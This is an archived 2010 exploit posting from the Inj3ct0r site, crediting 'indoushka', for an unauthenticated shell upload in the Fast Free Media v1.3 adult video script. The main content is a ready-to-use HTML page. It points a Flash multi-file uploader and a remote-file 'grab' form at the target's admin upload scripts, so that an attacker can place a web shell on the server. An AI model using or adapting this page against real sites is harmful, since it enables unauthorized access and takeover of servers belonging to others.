Fast Free Media v1.3 Adult Site Upload Shell Exploit
Posted on 11 May 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Fast Free Media v1.3 Adult Site Upload Shell Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==================================================== Fast Free Media v1.3 Adult Site Upload Shell Exploit ==================================================== ======================================================================================== | # Title : Fast Free Media V 1.3 Adult Site Upload Shell Exploiot | # Author : indoushka | # email : indoushka@hotmail.com | # Home : www.iqs3cur1ty.com | # Script : Powered by FastFreeMedia.com All Videos Copyright © To Their Respective Owners. All Rights Reserved. | # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu) | # Bug : Upload Shell | # Download : http://www.fastfreemedia.com/ ====================== Exploit By indoushka ================================= # Exploit : If you have FFMPEG installed you can convert your /media/uploads files to .flv <a href="http://127.0.0.1/Ffm/admin/ffmpeg.php">here</a>. Or you can rebuild thumbnails using FFMPEG-PHP <a href="http://127.0.0.1/Ffm/admin/ffmpeg.php?action=thumb">here</a>. <div style="clear:both;height:20px;">&nbsp;</div> <div class="tabular_data" id="uftd"> <div class="header"><strong>Select a Media File to Upload</strong> Files will be uploaded to: <em>/media/upload</em></div> <table> <tr> <td align="center">This flash tool has a built in size limit of 50Mb but kicks ass for anything under that. <font style="font-size:10px;font-family:Verdana, Arial, Helvetica, sans-serif" color="#494949">&nbsp; </font><br> <OBJECT id="FlashFilesUpload" codeBase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="450" height="350" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" VIEWASTEXT> <PARAM NAME="FlashVars" VALUE="uploadUrl=http://127.0.0.1/Ffm/admin/uploadfiles.php"> <PARAM NAME="BGColor" VALUE="#F8F6E6"> <PARAM NAME="Movie" VALUE="http://127.0.0.1/Ffm/admin/ElementITMultiPowUpload1.7.swf"> <PARAM NAME="Src" VALUE="http://127.0.0.1/Ffm/admin/ElementITMultiPowUpload1.7.swf"> <PARAM NAME="WMode" VALUE="Window"> <PARAM NAME="Play" VALUE="-1"> <PARAM NAME="Loop" VALUE="-1"> <PARAM NAME="Quality" VALUE="High"> <PARAM NAME="SAlign" VALUE=""> <PARAM NAME="Menu" VALUE="-1"> <PARAM NAME="Base" VALUE=""> <PARAM NAME="AllowScriptAccess" VALUE="always"> <PARAM NAME="Scale" VALUE="ShowAll"> <PARAM NAME="DeviceFont" VALUE="0"> <PARAM NAME="EmbedMovie" VALUE="0"> <PARAM NAME="SWRemote" VALUE=""> <PARAM NAME="MovieData" VALUE=""> <PARAM NAME="SeamlessTabbing" VALUE="1"> <PARAM NAME="Profile" VALUE="0"> <PARAM NAME="ProfileAddress" VALUE=""> <PARAM NAME="ProfilePort" VALUE="0"> <embed bgcolor="#F8F6E6" id="EmbedFlashFilesUpload" src="ElementITMultiPowUpload1.7.swf" quality="high" pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="450" height="350" flashvars="uploadUrl=uploadfiles.php?username=<?php echo"$username";?>"> </embed> </OBJECT> </td> </tr> </table> <table> <form action="http://127.0.0.1/Ffm/admin/wget.php?action=image&movie=1" method="post"> <tr> <td>Grab from Remote server <em></em></td> <td><span class="form"> <input name="rmtimage" type="text" size="90" /> </span></td> <td class="last"><input type="submit" value="Grab File" /></td> </tr> </form> </table> </div> # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-11]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
